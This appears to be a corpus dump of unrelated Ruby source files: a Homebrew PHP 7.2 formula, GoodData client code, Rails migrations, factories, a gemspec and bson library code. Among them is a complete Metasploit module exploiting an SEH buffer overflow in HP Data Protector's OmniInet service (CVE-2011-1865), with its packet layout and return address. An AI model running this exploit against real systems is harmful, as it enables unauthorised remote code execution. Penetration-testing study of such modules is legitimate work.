serialnumber: 0,
rundeck_version: ''
)
end
describe 'with array parameters' do
let(:title) { 'source one' }
let(:params) do
{
'package_ensure' => 'latest',
'security_roles_array_enabled' => true
}
end
security_roles_array = %w[devops roots]
security_roles_array.each do |roles|
it "augeas with param: #{roles}" do
is_expected.to contain_augeas('rundeck/web.xml/security-role/role-name').with_changes(["set web-app/security-role/role-name/#text '#{roles}'"])
end
end
end
end
end
end
| 25.939394 | 141 | 0.556075 |
ab8df64abebc20da43e9231ad5a4e4b32aaef5aa | 15,870 | class PhpAT72 < Formula
desc "General-purpose scripting language"
homepage "https://www.php.net/"
# Should only be updated if the new version is announced on the homepage, https://www.php.net/
url "https://www.php.net/distributions/php-7.2.31.tar.xz"
mirror "https://fossies.org/linux/www/php-7.2.31.tar.xz"
sha256 "8beaa634bb878a96af9bc8643811ea46973f5f41ad2bfb6ab4cfd290e5a39806"
revision 1
bottle do
sha256 "88e7932c8403e83c4b7ce1a5a5a704e2b45d0618f79ab568b0e92dc795b896d4" => :catalina
sha256 "2d601cec4b57cefa451e9bd4892df9c8f406de09c1aaafbf7d3a9a88ab540e67" => :mojave
sha256 "d1383e513d27510e4e8974460756cbef14a59c1fcbcd35c9dbeb6624689ea22f" => :high_sierra
end
keg_only :versioned_formula
deprecate! :date => "2020-11-30"
depends_on "httpd" => [:build, :test]
depends_on "pkg-config" => :build
depends_on "apr"
depends_on "apr-util"
depends_on "argon2"
depends_on "aspell"
depends_on "autoconf"
depends_on "curl-openssl"
depends_on "freetds"
depends_on "freetype"
depends_on "gettext"
depends_on "glib"
depends_on "gmp"
depends_on "icu4c"
depends_on "jpeg"
depends_on "libpng"
depends_on "libpq"
depends_on "libsodium"
depends_on "libzip"
depends_on "openldap"
depends_on "[email protected]"
depends_on "sqlite"
depends_on "tidy-html5"
depends_on "unixodbc"
depends_on "webp"
uses_from_macos "bzip2"
uses_from_macos "libxml2"
uses_from_macos "libxslt"
uses_from_macos "zlib"
# PHP build system incorrectly links system libraries
# see https://github.com/php/php-src/pull/3472
patch :DATA
def install
# Ensure that libxml2 will be detected correctly in older MacOS
ENV["SDKROOT"] = MacOS.sdk_path if MacOS.version == :el_capitan || MacOS.version == :sierra
# buildconf required due to system library linking bug patch
system "./buildconf", "--force"
inreplace "configure" do |s|
s.gsub! "APACHE_THREADED_MPM=`$APXS_HTTPD -V | grep 'threaded:.*yes'`",
"APACHE_THREADED_MPM="
s.gsub! "APXS_LIBEXECDIR='$(INSTALL_ROOT)'`$APXS -q LIBEXECDIR`",
"APXS_LIBEXECDIR='$(INSTALL_ROOT)#{lib}/httpd/modules'"
s.gsub! "-z `$APXS -q SYSCONFDIR`",
"-z ''"
# apxs will interpolate the @ in the versioned prefix: https://bz.apache.org/bugzilla/show_bug.cgi?id=61944
s.gsub! "LIBEXECDIR='$APXS_LIBEXECDIR'",
"LIBEXECDIR='" + "#{lib}/httpd/modules".gsub("@", "\\@") + "'"
end
# Update error message in apache sapi to better explain the requirements
# of using Apache http in combination with php if the non-compatible MPM
# has been selected. Homebrew has chosen not to support being able to
# compile a thread safe version of PHP and therefore it is not
# possible to recompile as suggested in the original message
inreplace "sapi/apache2handler/sapi_apache2.c",
"You need to recompile PHP.",
"Homebrew PHP does not support a thread-safe php binary. "\
"To use the PHP apache sapi please change "\
"your httpd config to use the prefork MPM"
inreplace "sapi/fpm/php-fpm.conf.in", ";daemonize = yes", "daemonize = no"
# Required due to icu4c dependency
ENV.cxx11
config_path = etc/"php/#{php_version}"
# Prevent system pear config from inhibiting pear install
(config_path/"pear.conf").delete if (config_path/"pear.conf").exist?
# Prevent homebrew from harcoding path to sed shim in phpize script
ENV["lt_cv_path_SED"] = "sed"
# Each extension that is built on Mojave needs a direct reference to the
# sdk path or it won't find the headers
headers_path = "=#{MacOS.sdk_path_if_needed}/usr"
args = %W[
--prefix=#{prefix}
--localstatedir=#{var}
--sysconfdir=#{config_path}
--with-config-file-path=#{config_path}
--with-config-file-scan-dir=#{config_path}/conf.d
--with-pear=#{pkgshare}/pear
--enable-bcmath
--enable-calendar
--enable-dba
--enable-dtrace
--enable-exif
--enable-ftp
--enable-fpm
--enable-intl
--enable-mbregex
--enable-mbstring
--enable-mysqlnd
--enable-opcache-file
--enable-pcntl
--enable-phpdbg
--enable-phpdbg-readline
--enable-phpdbg-webhelper
--enable-shmop
--enable-soap
--enable-sockets
--enable-sysvmsg
--enable-sysvsem
--enable-sysvshm
--enable-wddx
--enable-zip
--with-apxs2=#{Formula["httpd"].opt_bin}/apxs
--with-bz2#{headers_path}
--with-curl=#{Formula["curl-openssl"].opt_prefix}
--with-fpm-user=_www
--with-fpm-group=_www
--with-freetype-dir=#{Formula["freetype"].opt_prefix}
--with-gd
--with-gettext=#{Formula["gettext"].opt_prefix}
--with-gmp=#{Formula["gmp"].opt_prefix}
--with-iconv#{headers_path}
--with-icu-dir=#{Formula["icu4c"].opt_prefix}
--with-jpeg-dir=#{Formula["jpeg"].opt_prefix}
--with-kerberos#{headers_path}
--with-layout=GNU
--with-ldap=#{Formula["openldap"].opt_prefix}
--with-ldap-sasl#{headers_path}
--with-libxml-dir#{headers_path}
--with-libedit#{headers_path}
--with-libzip
--with-mhash#{headers_path}
--with-mysql-sock=/tmp/mysql.sock
--with-mysqli=mysqlnd
--with-ndbm#{headers_path}
--with-openssl=#{Formula["[email protected]"].opt_prefix}
--with-password-argon2=#{Formula["argon2"].opt_prefix}
--with-pdo-dblib=#{Formula["freetds"].opt_prefix}
--with-pdo-mysql=mysqlnd
--with-pdo-odbc=unixODBC,#{Formula["unixodbc"].opt_prefix}
--with-pdo-pgsql=#{Formula["libpq"].opt_prefix}
--with-pdo-sqlite=#{Formula["sqlite"].opt_prefix}
--with-pgsql=#{Formula["libpq"].opt_prefix}
--with-pic
--with-png-dir=#{Formula["libpng"].opt_prefix}
--with-pspell=#{Formula["aspell"].opt_prefix}
--with-sodium=#{Formula["libsodium"].opt_prefix}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-tidy=#{Formula["tidy-html5"].opt_prefix}
--with-unixODBC=#{Formula["unixodbc"].opt_prefix}
--with-webp-dir=#{Formula["webp"].opt_prefix}
--with-xmlrpc
--with-xsl#{headers_path}
--with-zlib#{headers_path}
]
system "./configure", *args
system "make"
system "make", "install"
# Allow pecl to install outside of Cellar
extension_dir = Utils.safe_popen_read("#{bin}/php-config --extension-dir").chomp
orig_ext_dir = File.basename(extension_dir)
inreplace bin/"php-config", lib/"php", prefix/"pecl"
inreplace "php.ini-development", %r{; ?extension_dir = "\./"},
"extension_dir = \"#{HOMEBREW_PREFIX}/lib/php/pecl/#{orig_ext_dir}\""
# Use OpenSSL cert bundle
openssl = Formula["[email protected]"]
inreplace "php.ini-development", /; ?openssl\.cafile=/,
"openssl.cafile = \"#{openssl.pkgetc}/cert.pem\""
inreplace "php.ini-development", /; ?openssl\.capath=/,
"openssl.capath = \"#{openssl.pkgetc}/certs\""
config_files = {
"php.ini-development" => "php.ini",
"sapi/fpm/php-fpm.conf" => "php-fpm.conf",
"sapi/fpm/www.conf" => "php-fpm.d/www.conf",
}
config_files.each_value do |dst|
dst_default = config_path/"#{dst}.default"
rm dst_default if dst_default.exist?
end
config_path.install config_files
unless (var/"log/php-fpm.log").exist?
(var/"log").mkpath
touch var/"log/php-fpm.log"
end
end
def post_install
pear_prefix = pkgshare/"pear"
pear_files = %W[
#{pear_prefix}/.depdblock
#{pear_prefix}/.filemap
#{pear_prefix}/.depdb
#{pear_prefix}/.lock
]
%W[
#{pear_prefix}/.channels
#{pear_prefix}/.channels/.alias
].each do |f|
chmod 0755, f
pear_files.concat(Dir["#{f}/*"])
end
chmod 0644, pear_files
# Custom location for extensions installed via pecl
pecl_path = HOMEBREW_PREFIX/"lib/php/pecl"
ln_s pecl_path, prefix/"pecl" unless (prefix/"pecl").exist?
extension_dir = Utils.safe_popen_read("#{bin}/php-config --extension-dir").chomp
php_basename = File.basename(extension_dir)
php_ext_dir = opt_prefix/"lib/php"/php_basename
# fix pear config to install outside cellar
pear_path = HOMEBREW_PREFIX/"share/pear@#{php_version}"
cp_r pkgshare/"pear/.", pear_path
{
"php_ini" => etc/"php/#{php_version}/php.ini",
"php_dir" => pear_path,
"doc_dir" => pear_path/"doc",
"ext_dir" => pecl_path/php_basename,
"bin_dir" => opt_bin,
"data_dir" => pear_path/"data",
"cfg_dir" => pear_path/"cfg",
"www_dir" => pear_path/"htdocs",
"man_dir" => HOMEBREW_PREFIX/"share/man",
"test_dir" => pear_path/"test",
"php_bin" => opt_bin/"php",
}.each do |key, value|
value.mkpath if /(?<!bin|man)_dir$/.match?(key)
system bin/"pear", "config-set", key, value, "system"
end
system bin/"pear", "update-channels"
%w[
opcache
].each do |e|
ext_config_path = etc/"php/#{php_version}/conf.d/ext-#{e}.ini"
extension_type = (e == "opcache") ? "zend_extension" : "extension"
if ext_config_path.exist?
inreplace ext_config_path,
/#{extension_type}=.*$/, "#{extension_type}=#{php_ext_dir}/#{e}.so"
else
ext_config_path.write <<~EOS
[#{e}]
#{extension_type}="#{php_ext_dir}/#{e}.so"
EOS
end
end
end
def caveats
<<~EOS
To enable PHP in Apache add the following to httpd.conf and restart Apache:
LoadModule php7_module #{opt_lib}/httpd/modules/libphp7.so
<FilesMatch \\.php$>
SetHandler application/x-httpd-php
</FilesMatch>
Finally, check DirectoryIndex includes index.php
DirectoryIndex index.php index.html
The php.ini and php-fpm.ini file can be found in:
#{etc}/php/#{php_version}/
EOS
end
def php_version
version.to_s.split(".")[0..1].join(".")
end
plist_options :manual => "php-fpm"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/php-fpm</string>
<string>--nodaemonize</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/php-fpm.log</string>
</dict>
</plist>
EOS
end
test do
assert_match /^Zend OPcache$/, shell_output("#{bin}/php -i"),
"Zend OPCache extension not loaded"
# Test related to libxml2 and
# https://github.com/Homebrew/homebrew-core/issues/28398
assert_includes MachO::Tools.dylibs("#{bin}/php"),
"#{Formula["libpq"].opt_lib}/libpq.5.dylib"
system "#{sbin}/php-fpm", "-t"
system "#{bin}/phpdbg", "-V"
system "#{bin}/php-cgi", "-m"
# Prevent SNMP extension to be added
assert_no_match /^snmp$/, shell_output("#{bin}/php -m"),
"SNMP extension doesn't work reliably with Homebrew on High Sierra"
begin
port = free_port
port_fpm = free_port
expected_output = /^Hello world!$/
(testpath/"index.php").write <<~EOS
<?php
echo 'Hello world!' . PHP_EOL;
var_dump(ldap_connect());
EOS
main_config = <<~EOS
Listen #{port}
ServerName localhost:#{port}
DocumentRoot "#{testpath}"
ErrorLog "#{testpath}/httpd-error.log"
ServerRoot "#{Formula["httpd"].opt_prefix}"
PidFile "#{testpath}/httpd.pid"
LoadModule authz_core_module lib/httpd/modules/mod_authz_core.so
LoadModule unixd_module lib/httpd/modules/mod_unixd.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
DirectoryIndex index.php
EOS
(testpath/"httpd.conf").write <<~EOS
#{main_config}
LoadModule mpm_prefork_module lib/httpd/modules/mod_mpm_prefork.so
LoadModule php7_module #{lib}/httpd/modules/libphp7.so
<FilesMatch \\.(php|phar)$>
SetHandler application/x-httpd-php
</FilesMatch>
EOS
(testpath/"fpm.conf").write <<~EOS
[global]
daemonize=no
[www]
listen = 127.0.0.1:#{port_fpm}
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
EOS
(testpath/"httpd-fpm.conf").write <<~EOS
#{main_config}
LoadModule mpm_event_module lib/httpd/modules/mod_mpm_event.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_fcgi_module lib/httpd/modules/mod_proxy_fcgi.so
<FilesMatch \\.(php|phar)$>
SetHandler "proxy:fcgi://127.0.0.1:#{port_fpm}"
</FilesMatch>
EOS
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
Process.kill("TERM", pid)
Process.wait(pid)
fpm_pid = fork do
exec sbin/"php-fpm", "-y", "fpm.conf"
end
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd-fpm.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
ensure
if pid
Process.kill("TERM", pid)
Process.wait(pid)
end
if fpm_pid
Process.kill("TERM", fpm_pid)
Process.wait(fpm_pid)
end
end
end
end
__END__
diff --git a/acinclude.m4 b/acinclude.m4
index 168c465f8d..6c087d152f 100644
--- a/acinclude.m4
+++ b/acinclude.m4
@@ -441,7 +441,11 @@ dnl
dnl Adds a path to linkpath/runpath (LDFLAGS)
dnl
AC_DEFUN([PHP_ADD_LIBPATH],[
- if test "$1" != "/usr/$PHP_LIBDIR" && test "$1" != "/usr/lib"; then
+ case "$1" in
+ "/usr/$PHP_LIBDIR"|"/usr/lib"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/lib[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/lib[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
ifelse([$2],,[
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
@@ -452,8 +456,8 @@ AC_DEFUN([PHP_ADD_LIBPATH],[
else
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl
@@ -487,7 +491,11 @@ dnl add an include path.
dnl if before is 1, add in the beginning of INCLUDES.
dnl
AC_DEFUN([PHP_ADD_INCLUDE],[
- if test "$1" != "/usr/include"; then
+ case "$1" in
+ "/usr/include"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/include[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/include[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
PHP_RUN_ONCE(INCLUDEPATH, $ai_p, [
if test "$2"; then
@@ -495,8 +503,8 @@ AC_DEFUN([PHP_ADD_INCLUDE],[
else
INCLUDES="$INCLUDES -I$ai_p"
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl internal, don't use
@@ -2411,7 +2419,8 @@ AC_DEFUN([PHP_SETUP_ICONV], [
fi
if test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.a ||
- test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME ||
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.tbd
then
PHP_CHECK_LIBRARY($iconv_lib_name, libiconv, [
found_iconv=yes
| 32.520492 | 113 | 0.624575 |
26fc7da8d9d8ff0269ab4cc09584a5fff2115560 | 4,979 | # encoding: UTF-8
#
# Copyright (c) 2010-2015 GoodData Corporation. All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
require_relative '../rest/resource'
require_relative '../mixins/data_property_reader'
require_relative '../mixins/links'
require_relative '../mixins/rest_resource'
require_relative '../mixins/uri_getter'
module GoodData
class Client < Rest::Resource
data_property_reader 'id'
attr_accessor :domain
include Mixin::Links
include Mixin::UriGetter
CLIENT_TEMPLATE = {
client: {
id: nil,
segment: nil,
project: nil
}
}
class << self
def [](id, opts = {})
domain = opts[:domain]
segment = opts[:segment]
fail ArgumentError, 'No :domain specified' if domain.nil?
fail ArgumentError, 'No :segment specified' if segment.nil?
client = domain.client
fail ArgumentError, 'No client specified' if client.nil?
base_uri = domain.segments_uri + "/clients?segment=#{CGI.escape(segment.segment_id)}"
tenants_uri = id == :all ? base_uri : base_uri + "&name=#{CGI.escape(id)}"
e = Enumerator.new do |y|
loop do
res = client.get tenants_uri
res['clients']['paging']['next']
res['clients']['items'].each do |i|
p = i['client']['project']
tenant = client.create(GoodData::Client, i.merge('domain' => domain))
tenant.project = p
y << tenant
end
url = res['clients']['paging']['next']
break unless url
end
end
id == :all ? e : e.first
end
# Creates new client from parameters passed
#
# @param options [Hash] Optional options
# @return [GoodData::Client] New GoodData::Client instance
def create(data = {}, options = {})
segment = options[:segment]
domain = segment.domain
tenant = client.create(GoodData::Client, GoodData::Helpers.deep_stringify_keys(CLIENT_TEMPLATE.merge(domain: domain)), domain: domain)
tenant.tap do |s|
s.project = data[:project]
s.client_id = data[:id]
s.segment = segment.uri
end
end
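# Usage sketch (illustrative only; `segment` and `project` stand for already
# fetched GoodData::Segment and GoodData::Project instances):
#   tenant = GoodData::Client.create({ id: 'client_1', project: project.uri }, segment: segment)
#   tenant.save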
end
def initialize(data)
super(data)
@domain = data.delete('domain')
@json = data
end
# Client id getter for the Client. Called client_id since id is a reserved word in the ruby world
#
# @return [String] Client id
def client_id
data['id']
end
def client_id=(a_name)
data['id'] = a_name
self
end
# Setter for the project this client has set
#
# @param a_project [String|GoodData::Project] Id or an instance of a project
# @return [GoodData::Client] Returns the instance of the client
def project=(a_project)
data['project'] = a_project.respond_to?(:uri) ? a_project.uri : a_project
self
end
# Project URI this client has set
#
# @return [String] Returns the URI of the project this client has set
def project_uri
data['project']
end
# Project this client has set
#
# @return [GoodData::Project] Returns the instance of the client's project
def project
client.projects(project_uri) if project?
end
# Returns boolean if client has a project provisioned
#
# @return [Boolean] Returns true if client has a project provisioned. False otherwise
def project?
project_uri != nil
end
# Reloads the client from the URI
#
# @return [GoodData::Client] Returns the updated client object
def reload!
res = client.get(uri)
@json = res
self
end
# Segment id setter which this client is connected to.
#
# @param a_segment [String] Id of the segment.
# @return [GoodData::Client] Returns the instance of the client
def segment=(a_segment)
data['segment'] = a_segment.respond_to?(:uri) ? a_segment.uri : a_segment
self
end
# Segment this client is connected to.
#
# @return [GoodData::Segment] Segment
def segment
segment_res = client.get(data['segment'])
client.create(GoodData::Segment, segment_res)
end
# Segment URI this client is connected to.
#
# @return [String] Segment URI
def segment_uri
data['segment']
end
# Creates or updates a client instance on the API.
#
# @return [GoodData::Client] Client instance
def save
if uri
client.put(uri, json)
else
res = client.post(domain.segments_uri + '/clients', json)
@json = res
end
self
end
# Deletes a client instance on the API.
#
# @return [GoodData::Client] Client instance
def delete
project.delete if project && !project.deleted?
client.delete(uri) if uri
end
end
end
| 27.815642 | 142 | 0.615385 |
f73eb9a1a2b3f842ef1a037ba665698c97aad5ef | 692 | FactoryGirl.define do
factory :restaurant_partial, class: "Restaurant" do
active true
status :new_account #AccountStatus::NewAccount.new.text # AccountStatuses::NewAccount
brief "is a newly signed up account. They say it gets busy. Let us know how it goes!"
unedited true
after(:build) do |f|
f.mini_contact = FactoryGirl.build(:mini_contact, :with_restaurant, restaurant: f)
f.location = FactoryGirl.build(:location, :with_locatable, locatable: f)
f.managers = [ FactoryGirl.build(:manager, :with_restaurant, restaurants: [ f ]) ]
f.rider_payment_info = FactoryGirl.build(:rider_payment_info, :with_restaurant, restaurant: f)
end
end
end
| 43.25 | 100 | 0.725434 |
79b53e27ae3c4e0768efd9f3f2e5ec1562fab02b | 1,581 | # -*- ruby -*-
# encoding: utf-8
require File.expand_path("lib/google/cloud/os_login/v1/version", __dir__)
Gem::Specification.new do |gem|
gem.name = "google-cloud-os_login-v1"
gem.version = Google::Cloud::OsLogin::V1::VERSION
gem.authors = ["Google LLC"]
gem.email = "[email protected]"
gem.description = "Use OS Login to manage SSH access to your instances using IAM without having to create and manage individual SSH keys. OS Login maintains a consistent Linux user identity across VM instances and is the recommended way to manage many users across multiple instances or projects."
gem.summary = "API Client library for the Cloud OS Login V1 API"
gem.homepage = "https://github.com/googleapis/google-cloud-ruby"
gem.license = "Apache-2.0"
gem.platform = Gem::Platform::RUBY
gem.files = `git ls-files -- lib/*`.split("\n") +
`git ls-files -- proto_docs/*`.split("\n") +
["README.md", "LICENSE.md", "AUTHENTICATION.md", ".yardopts"]
gem.require_paths = ["lib"]
gem.required_ruby_version = ">= 2.4"
gem.add_dependency "gapic-common", "~> 0.2"
gem.add_dependency "google-cloud-errors", "~> 1.0"
gem.add_development_dependency "google-style", "~> 1.24.0"
gem.add_development_dependency "minitest", "~> 5.10"
gem.add_development_dependency "rake", ">= 12.0"
gem.add_development_dependency "redcarpet", "~> 3.0"
gem.add_development_dependency "simplecov", "~> 0.18"
gem.add_development_dependency "yard", "~> 0.9"
end
| 43.916667 | 301 | 0.664137 |
f8aeca8a7231cf7d10f767a39a36d7bfa3b8ff7e | 3,461 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Hewlett-Packard
OmniInet NT Service. By sending a specially crafted opcode 27 packet,
a remote attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-1865' ],
[ 'OSVDB', '73571'],
[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',
{
#POP/POP/RET from OmniBack\bin\MSVCR71.dll
'Ret' => 0x7c35630d
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2011'))
register_options([Opt::RPORT(5555)], self.class)
end
def check
connect
sock.put(rand_text_alpha_upper(64))
resp = sock.get_once(-1,5)
disconnect
if (resp)
resp = resp.unpack('v*').pack('C*')
print_status("Received response: " + resp)
# extract version
if (resp =~ /HP Data Protector/)
version = resp.split[3]
elsif (resp =~ /HP OpenView Storage Data Protector/)
version = resp.split[5]
elsif (resp =~ /HP StorageWorks Application Recovery Manager/)
version = resp.split[5]
else
return Exploit::CheckCode::Detected
end
version = version.split('.')
major = version[1].to_i
minor = version[2].to_i
if ((major < 6) or (major == 6 and minor < 11))
return Exploit::CheckCode::Appears
end
if ((major > 6) or (major == 6 and minor >= 11))
return Exploit::CheckCode::Safe
end
end
return Exploit::CheckCode::Safe
end
def exploit
connect
trigger = rand_text_alpha_upper(10000)
trigger[4552, payload.encoded.length] = payload.encoded
trigger[5352, 8] = generate_seh_record(target.ret)
trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-788").encode_string
opcode = "27"
packet = Rex::Text.to_unicode("\x00")
packet << "\x27\xca" #length
packet << "\xff\xfe\x32"
packet << "\x00\x00\x00"
packet << Rex::Text.to_unicode("\x20\x61\x00") * 3
packet << Rex::Text.to_unicode("\x20")
packet << trigger
packet << Rex::Text.to_unicode("\x00")
packet << Rex::Text.to_unicode("\x20\x61\x00")
packet << Rex::Text.to_unicode("\x20" + opcode + "\x00")
packet << Rex::Text.to_unicode("\x20\x61\x00") * 24
print_status("Trying #{target.name}...")
sock.put(packet)
select(nil,nil,nil,10)
handler
disconnect
end
end
| 27.039063 | 102 | 0.56631 |
1dd6dd5d3f4dd8911c623499421992b8ce04d7ab | 241 | class AddActivateionToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :activation_digest, :string
add_column :users, :activated, :boolean, default: false
add_column :users, :activated_at, :datetime
end
end
| 30.125 | 59 | 0.746888 |
014a5d30df4fdcf034492bd99092b4ed580a16bb | 68 | class DealershipVehiclesController < ApplicationController
end
| 17 | 58 | 0.838235 |
ffd67bbc64023dbf6f33f485b74d1b3fc551fa16 | 315 | # Needed to import datamapper and other gems
require 'rubygems'
require 'pathname'
# Add all external dependencies for the plugin here
gem 'dm-core', '0.10.0'
require 'dm-core'
dir = Pathname(__FILE__).dirname.expand_path / 'dm-querizer'
require dir / 'querizer'
require dir / 'model'
require dir / 'collection'
| 22.5 | 60 | 0.742857 |
21f10bb5bdeea3da28091a929f098808bb41baf8 | 1,566 | # ActsAsSlugged
#
# This module automatically generates slugs based on the :to_s field using a before_validation filter
#
# Mark your model with 'acts_as_slugged' and make sure you have a string field :slug
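#
# Minimal usage sketch (hypothetical Post model with a :slug string column,
# assuming the ActiveRecord extension below is registered on ActiveRecord::Base):
#   class Post < ActiveRecord::Base
#     acts_as_slugged
#     def to_s
#       title
#     end
#   end
#   Post.find('my-first-post') # finds by slug, falling back to id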
module ActsAsSlugged
extend ActiveSupport::Concern
module ActiveRecord
def acts_as_slugged(options = nil)
include ::ActsAsSlugged
end
end
included do
extend FinderMethods
before_validation { self.slug ||= build_slug }
validates :slug,
presence: true, uniqueness: true, exclusion: { in: excluded_slugs }, length: { maximum: 255 },
format: { with: /\A[a-zA-Z0-9_-]*\z/, message: 'only _ and - symbols allowed. no spaces either.' }
end
module ClassMethods
def relation
super.tap { |relation| relation.extend(FinderMethods) }
end
def excluded_slugs
::ActiveRecord::Base.connection.tables.map { |x| x }.compact
end
end
module FinderMethods
def find(*args)
return super unless args.length == 1
return super if block_given?
where(slug: args.first).or(where(id: args.first)).first || raise(::ActiveRecord::RecordNotFound.new("Couldn't find #{name} with 'slug'=#{args.first}"))
end
end
# Instance Methods
def build_slug
slug = self.to_s.parameterize.downcase[0, 250]
if self.class.excluded_slugs.include?(slug)
slug = "#{slug}-#{self.class.name.demodulize.parameterize}"
end
if (count = self.class.where(slug: slug).count) > 0
slug = "#{slug}-#{count+1}"
end
slug
end
def to_param
slug
end
end
| 23.727273 | 157 | 0.671775 |
335fb757c2039b4a66e29cdfd161175f18cb639d | 1,514 | # frozen_string_literal: true
# Allows reviewers to specify agreement variables for resubmission.
class Reviewer::AgreementVariablesController < ApplicationController
before_action :authenticate_user!
before_action :find_editable_data_request_or_redirect
before_action :find_agreement_variable_or_redirect, only: [:edit, :update]
def update
if @agreement_variable.update(agreement_variable_params)
respond_to do |format|
format.html do
redirect_to review_path(@data_request), notice: "Agreement variable was successfully updated."
end
format.js { render :show }
end
else
render :edit
end
end
private
def find_editable_data_request_or_redirect
@data_request = current_user.review_editors_data_requests
.where(status: "submitted")
.find_by(id: params[:data_request_id])
empty_response_or_root_path(reviews_path) unless @data_request
end
def find_agreement_variable_or_redirect
@agreement_variable = @data_request.agreement_variables.find_by(id: params[:id])
empty_response_or_root_path(review_path(@data_request)) unless @agreement_variable
end
def agreement_variable_params
params[:agreement_variable] ||= { blank: "1" }
params[:agreement_variable][:resubmission_required] = params.dig(:agreement_variable, :reviewer_comment).present?
params.require(:agreement_variable).permit(:reviewer_comment, :resubmission_required)
end
end
| 36.047619 | 117 | 0.742404 |
91ca08a9ceb6926fd992617d82f1e38d92f7990f | 259 | class CreatePicture < ActiveRecord::Migration
def change
create_table :pictures do |t|
t.timestamps
t.string :name, null: false
t.text :description
t.datetime :date
t.integer :monument_id, null: false
end
end
end
| 21.583333 | 45 | 0.648649 |
33eb747d7f8da7e3767bd3ac03ef3c3ca5d25039 | 2,783 | # Copyright (C) 2009-2019 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "bson/environment"
# The core namespace for all BSON related behaviour.
#
# @since 0.0.0
module BSON
# Create a new object id from a string using ObjectId.from_string
#
# @example Create an object id from the string.
# BSON::ObjectId(id)
#
# @param [ String ] string The string to create the id from.
#
# @raise [ BSON::ObjectId::Invalid ] If the provided string is invalid.
#
# @return [ BSON::ObjectId ] The new object id.
#
# @see ObjectId.from_string
def self.ObjectId(string)
self::ObjectId.from_string(string)
end
# Constant for binary string encoding.
#
# @since 2.0.0
BINARY = "BINARY".freeze
# Constant for bson types that don't actually serialize a value.
#
# @since 2.0.0
NO_VALUE = "".force_encoding(BINARY).freeze
# Constant for a null byte (0x00).
#
# @since 2.0.0
NULL_BYTE = 0.chr.force_encoding(BINARY).freeze
# Constant for UTF-8 string encoding.
#
# @since 2.0.0
UTF8 = "UTF-8".freeze
end
require "bson/config"
require "bson/registry"
require "bson/specialized"
require "bson/json"
require "bson/int32"
require "bson/int64"
require "bson/integer"
require "bson/array"
require "bson/binary"
require "bson/boolean"
require "bson/code"
require "bson/code_with_scope"
require "bson/date"
require "bson/date_time"
require "bson/decimal128"
require "bson/document"
require "bson/ext_json"
require "bson/false_class"
require "bson/float"
require "bson/hash"
require "bson/open_struct"
require "bson/max_key"
require "bson/min_key"
require "bson/nil_class"
require "bson/object"
require "bson/object_id"
require "bson/regexp"
require "bson/string"
require "bson/symbol"
require "bson/time"
require "bson/timestamp"
require "bson/true_class"
require "bson/undefined"
require "bson/version"
# If we are using JRuby, attempt to load the Java extensions, if we are using
# MRI or Rubinius, attempt to load the C extensions.
#
